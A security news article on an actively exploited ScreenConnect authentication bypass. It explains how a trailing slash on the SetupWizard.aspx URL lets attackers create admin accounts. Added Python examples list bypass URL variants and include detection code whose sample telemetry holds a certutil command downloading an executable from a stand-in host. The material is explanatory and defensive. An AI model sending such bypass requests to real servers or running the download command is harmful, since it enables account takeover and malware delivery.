Critical ConnectWise ScreenConnect flaw exploited in the wild: Update

A critical vulnerability patched this week in the ConnectWise ScreenConnect remote desktop software is already being exploited in the wild. Researchers warn that it’s trivial to exploit the flaw, which allows attackers to bypass authentication and gain remote code execution on systems, and proof-of-concept exploits already exist.

ScreenConnect is a popular remote support tool with both on-premises and in-cloud deployments. According to ConnectWise’s advisory released Monday, the cloud deployments hosted at screenconnect.com or hostedrmm.com have automatically been patched, but customers need to urgently upgrade their on-premises deployments to version 23.9.8.

Data from internet scanning service Censys showed over 8,000 vulnerable ScreenConnect servers when the vulnerability was disclosed. However, the impact of a successful exploit could extend past the server itself since a single ScreenConnect server could provide attackers with access to hundreds or thousands of endpoints — even across multiple organizations if the server is run by a managed service provider (MSP).

Attackers have exploited vulnerabilities in remote monitoring and management (RMM) tools used by MSPs in the past to gain access to their customers’ networks, and they have also abused such tools for command and control in other attacks. Last month, the US Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) issued a joint advisory about a malicious campaign in which phishing emails led victims to download legitimate RMM software, such as ScreenConnect and AnyDesk, which the attackers then used to steal money from victims’ bank accounts in a refund scam.

In its original advisory, ConnectWise said there was no evidence of the two vulnerabilities it disclosed being exploited in the wild, but one day later it updated its advisory to warn customers that: “We received updates of compromised accounts that our incident response team have been able to investigate and confirm.”

Authentication bypass in the ScreenConnect setup wizard

The ScreenConnect patch addresses two vulnerabilities that don’t yet have CVE identifiers: an authentication bypass rated at the maximum score of 10 (Critical) on the CVSS severity scale, and an improper limitation of a pathname to a restricted directory, also known as a path traversal flaw, rated 8.4 (High).

Researchers from security firms Horizon3.ai and Huntress independently analyzed the patches and determined that the authentication bypass flaw is caused by attackers being able to access and run the initial setup wizard again on an existing deployment. One critical part of this setup wizard, which should only be run once when the software is deployed, is that it allows the customer to set the admin username and password. Therefore, by running it again, an attacker is able to reset the application’s user database and create a new administrative account with credentials they control.

The application already had code that was meant to block requests trying to access the SetupWizard.aspx page after the initial setup was complete, but the check was not strong enough and did not block all variants of the URL. “The use of string.Equals checks for exact equality, so a URL like <app_url>/SetupWizard.aspx will match,” researchers from Horizon3.ai said. “However, there are other URLs that resolve to SetupWizard.aspx that don’t match. If we simply add a forward slash to the end of the URL (<app_url>/SetupWizard.aspx/) we get access to the setup wizard, even after the application is already set up.”
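The following Python is an added illustration of the flaw class Horizon3.ai describes, not ScreenConnect’s own code: a gate that compares the request path with exact string equality lets the trailing-slash variant through, while a gate that normalises the path first does not. The function names, the `gate` helper and the list of variants are constructed for this example.

```python
from urllib.parse import unquote

WIZARD = "SetupWizard.aspx"

def weak_is_setup_wizard(request_path: str) -> bool:
    """Flawed gate as described in the article: exact string equality only."""
    return request_path == "/" + WIZARD

def hardened_is_setup_wizard(request_path: str) -> bool:
    """Normalise the request before comparing, so every spelling the web server
    would still route to the wizard handler is recognised."""
    path = request_path.split("?", 1)[0].split("#", 1)[0]
    # Decode repeatedly so double-encoding (%252E) cannot hide the dot.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    # Splitting on "/" and dropping empty segments removes the trailing slash
    # (the variant quoted above) and any doubled slashes.
    segments = [s for s in path.split("/") if s]
    # Match on any segment, case-insensitively: a deny-list check that
    # over-matches fails closed, which is the safe direction here.
    return any(seg.casefold() == WIZARD.casefold() for seg in segments)

def gate(request_path: str, setup_complete: bool, is_wizard) -> str:
    """'blocked' when the wizard is requested after setup, 'allowed' otherwise."""
    if setup_complete and is_wizard(request_path):
        return "blocked"
    return "allowed"

# Constructed variants that all resolve to the same handler as /SetupWizard.aspx.
BYPASS_VARIANTS = [
    "/SetupWizard.aspx/",
    "/setupwizard.aspx",
    "/SetupWizard%2Easpx",
    "/SetupWizard.aspx/extra",
]

def compare(variants=BYPASS_VARIANTS):
    """Map each variant to (weak gate result, hardened gate result) after setup."""
    return {
        v: (gate(v, True, weak_is_setup_wizard), gate(v, True, hardened_is_setup_wizard))
        for v in variants
    }
```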

This vulnerability is similar to one patched in January in Fortra GoAnywhere MFT, CVE-2024-0204, where attackers could similarly use a specially crafted request to reinitialize the original setup wizard and create their own administrative account. “The application’s Admin -> Audit page displays a list of recent login attempts along with the IP address,” the Horizon3.ai researchers said. “You can check this page for any unrecognized users or IP addresses.”

The Huntress team also released detection guidance and the ConnectWise advisory lists several IP addresses used by attackers so far as indicators of compromise.

Update: Exploit used to deploy malware via ScreenConnect extensions

Researchers from Bitdefender reported seeing attacks that exploited this vulnerability to deploy rogue ScreenConnect extensions with the goal of downloading additional malicious payloads. ScreenConnect supports custom extensions that allow users to customize their remote access and support experience with additional features and functionality.

Bitdefender observed rogue files placed in the folder %ProgramFiles(x86)%\ScreenConnect\App_Extensions with names such as iyrretkg.ashx, nsrtxeav.ashx and exirjllq.ashx. These files triggered detection events for Generic.Cert.Downloader.1, a detection signature in Bitdefender products for malware downloaders that make use of the Windows built-in certutil.exe tool. Bitdefender did not manage to obtain a copy of these files to analyze, but their MD5 hashes are available in the company’s report and can be used as indicators of compromise.

“Threat actors commonly employ this tool with the -urlcache or -f arguments, to initiate the download of additional malicious payloads onto the victim’s system,” the Bitdefender researchers said. “Considering the timing and the format of randomly generated filenames, these attacks could be based on one of the published POCs.”
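As an added detection example, not taken from Bitdefender’s report or the ConnectWise advisory, this Python applies the two indicators described above to constructed sample telemetry: .ashx files dropped under the App_Extensions folder, and certutil.exe launched with -urlcache or -f. The `type|payload` event format, the sample lines and the severity labels are all constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Folder and filename shape from the observations described above.
EXT_DIR = PureWindowsPath(r"C:\Program Files (x86)\ScreenConnect\App_Extensions")
RANDOM_ASHX = re.compile(r"^[a-z]{8}\.ashx$")      # heuristic: 8 random lowercase letters
CERTUTIL_DOWNLOAD_FLAGS = {"-urlcache", "-f"}

# Constructed sample telemetry, one "type|payload" event per line (not real product output).
SAMPLE_EVENTS = [
    r"FileCreate|C:\Program Files (x86)\ScreenConnect\App_Extensions\iyrretkg.ashx",
    r"FileCreate|C:\Program Files (x86)\ScreenConnect\App_Extensions\Helper.ashx",
    r"FileCreate|C:\Temp\notes.txt",
    r"ProcessCreate|certutil.exe -urlcache -split -f http://payload.example/x.exe C:\Users\Public\x.exe",
    r"ProcessCreate|certutil.exe -verify C:\Temp\cert.cer",
]

def check_file_event(path_str):
    """Return (severity, reason) for a created file, or None if it is not of interest."""
    p = PureWindowsPath(path_str)
    if EXT_DIR not in p.parents or p.suffix.lower() != ".ashx":
        return None
    if RANDOM_ASHX.match(p.name):
        return ("high", f"random-looking .ashx handler under App_Extensions: {p.name}")
    return ("medium", f"new .ashx handler under App_Extensions: {p.name}")

def check_process_event(cmdline):
    """Return (severity, reason) for a process command line, or None."""
    tokens = cmdline.split()
    if not tokens or PureWindowsPath(tokens[0]).name.lower() != "certutil.exe":
        return None
    # certutil accepts both "-flag" and "/flag"; normalise to the dash form.
    flags = {"-" + t[1:].lower() for t in tokens[1:] if t.startswith(("-", "/"))}
    hits = flags & CERTUTIL_DOWNLOAD_FLAGS
    if not hits:
        return None
    has_url = any(t.lower().startswith(("http://", "https://")) for t in tokens)
    return ("high" if has_url else "medium", f"certutil download flags {sorted(hits)}")

def scan(events):
    """Run both checks over the event lines and return (severity, reason, event) tuples."""
    findings = []
    for line in events:
        kind, _, payload = line.partition("|")
        hit = None
        if kind == "FileCreate":
            hit = check_file_event(payload)
        elif kind == "ProcessCreate":
            hit = check_process_event(payload)
        if hit:
            findings.append((hit[0], hit[1], line))
    return findings
```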
